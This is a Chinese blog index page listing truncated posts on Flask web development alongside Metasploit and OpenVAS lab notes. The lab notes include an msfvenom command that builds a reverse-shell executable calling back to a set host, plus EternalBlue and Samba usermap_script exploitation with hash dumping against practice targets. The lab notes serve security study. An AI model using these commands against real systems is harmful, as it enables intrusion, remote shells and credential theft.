- 博客(15)
- 收藏
- 关注
RSS订阅原创 使用Flask-SQLAlchemy管理数据库
1、安装Flask-SQLAlchemy2、hello.py配置数据库from flask_sqlalchemy import SQLAlchemybasedir = os.path.abspath(os.path.dirname(__file__))app = Flask(__name__)app.config['SQLALCHEMY_DATABASE_URL'] = 'sqli...
2019-10-31 18:08:48
554
原创 MSF攻击载荷的生成
1、查看该模块的可用参数msfvenom -p windows/shell_reverse_tcp --list-options2、生成攻击载荷msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe -o payload1.exe其中:-f 表示输出格式-o 表示保存payload为一个...
2019-10-30 13:54:07
1606
原创 kail下使用exploit/windows/smb/ms17_010_eternalblue攻击win2k7练习meterpreter
1、use exploit/windows/smb/ms17_010_eternalblueoptions和payload设置如下2、攻击成功3、截屏meterpreter的screenshot命令可以获取活动用户的桌面截屏保存到相应目录4、sysinfo这个命令可以获取系统运行的平台5、获取靶机上的账户密码哈希值传递哈希值(失败)6、Meterpreter跳转,并保...
2019-10-30 10:53:31
2435
原创 web表单、重定向和用户会话、flask消息
web表单的视图函数和渲染1、安装Flask-WTFpip install flask-wtf示例:导入相应模块NameForm表单中有一个名为name的文本字段和一个名为submit的提交按钮StringField类表示属性为type="text"的< input>函数SubmitField类表示属性为type="submit"的< input>元素字段...
2019-10-29 21:59:51
159
原创 使用openvas扫描metasploitable2
1、进入configuration下的targets,点击坐上角的星号,创建扫描目标2、配置目标扫描任务进入scans下的tasks,点击左上角的星号,新建目标扫描任务3、点击绿色开始按钮,开始扫描任务...
2019-10-29 14:38:52
323
原创 安装openvas
1、升级系统apt-get updateapt-get upgrade2、更新完成后安装openvasapt-get install openvas开始安装openvas,安装的过程中系统提示,需要更新libs,按默认选择,更新内置的libs就行了3、等待libs全部跟新完成,输入如下openvas-setup安装完成4、修改默认配置修改默认密码前,需停止服务openvas...
2019-10-29 14:06:52
734
1
原创 使用Flask-Moment本地化日期和时间
安装 flask-moment在templates/base.html中引入moment.js库Flask-Moment依赖moment.js jquery.js,Bootstrap已经引入了moment.js,现在只需引入moment.js即可{% extends "bootstrap/base.html" %}{% block scripts %}{{ super() }}{...
2019-10-28 21:28:25
195
原创 Flask-Bootstrap的基本使用
1、使用Flask-Bootstrap集成Twitter Bootstrap项目架构安装flask-bootstrapFlask-Bootstrap从falsk_bootstrap命名空间中导入,然后把程序实例传入构造方法中进行初始化Jinja2中的extends指令从Flask-Bootstrap中导入bootstrap/base.html;从而实现模板继承。Flask-bootst...
2019-10-28 20:42:55
5546
2
原创 metasploit服务扫描与查点
在metasploit中scanner辅助模块中,有很多用于服务扫描和查点的工具,常以[service_name]_version和[service_name]_login命名[service_name]_version可用于遍历网络中包含了某种服务的主机,并进一步确定服务的版本[service_name]_login可对某种服务进行口令探测攻击1、Telnet服务扫描2、SSH服务扫描...
2019-10-28 16:47:27
295
原创 test.fire渗透测试
testfire.net 是一包含很多典型web漏洞的模拟银行网站,是IBM公司为了演示其著名的web应用安全扫面铲平AppScan的强大功能所建立的测试站点一、通过DNS和IP地址挖掘目标网络信息1、whois域名注册信息查询whois是一个用来查询域名注册信息数据库的工具,一般的域名注册信息包含域名所有者、服务商、管理员邮件地址、域名注册日期和过期信息2、nslookup和dig域名...
2019-10-28 15:24:55
4176
原创 msfcli 不能使用,在新版metasploit不再有效,推荐使用msfconsole
msfcli介绍及使用msfcli命令行程序是Metaploit框架为脚本自动化处理及与其他命令行工具互操作而设计的一种用户接口,它可以直接从命令行shell执行,并允许你通过linux的管道机制将结果输出重定向给其他程序进行处理在新版本的metasploit中,msfcli不再支持,推荐使用msfconsole1、编写攻击脚本,将在msfconsole中的各项设置写入该脚本中2、执行脚...
2019-10-28 10:43:26
815
原创 metasploit--multi/samba/usermap_script
metasploit的multi/samba/usermap_script使用1、search samba在渗透代码库中找出攻击Samba服务的模块2、use exploit/multi/samba/usermap_script使用该模块进行渗透攻击3、show payloads查看与该渗透攻击模块相兼容的攻击载荷4、set payload cmd/unix/bind_netc...
2019-10-28 10:24:01
509
原创 使用Flask-Script支持命令行选项
Flask 的开发 Web 服务器支持很多启动设置选项,但只能在脚本中作为参数传给 app.run()函数。这种方式并不十分方便,传递设置选项的理想方式是使用命令行参数Flask-Script 是一个 Flask 扩展,为 Flask 程序添加了一个命令行解析器。 Flask-Script 自带了一组常用选项,而且还支持自定义命令使用如下:1、安装Flask-Script在window...
2019-10-27 21:03:24
367
原创 pycharm专业版建立flask虚拟环境
pycharm专业版建立flask虚拟环境过程如下:1、建立项目文件目录点击左上角File按钮,选择New Project,在Pure Python下的Location位置选择项目的安放位置我的项目位置在 D:\flask_train\SITE01\ 下2、配置项目环境在Project Interprete选项下:设置新环境模式:选择Virtualenv,即通过虚拟环境构建该项目...
2019-10-27 17:20:01
3048
原创 python 每日一题
python 每日一题1、将你的 QQ 头像(或者微博头像)右上角加上红色的数字,类似于微信未读信息数量那种提示效果。 类似于图中效果from PIL import Image, ImageDraw, ImageFontdef add_num(img): draw = ImageDraw.Draw(img) myfont = ImageFont.truetype('C:/w...
2019-09-16 19:58:35
315
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人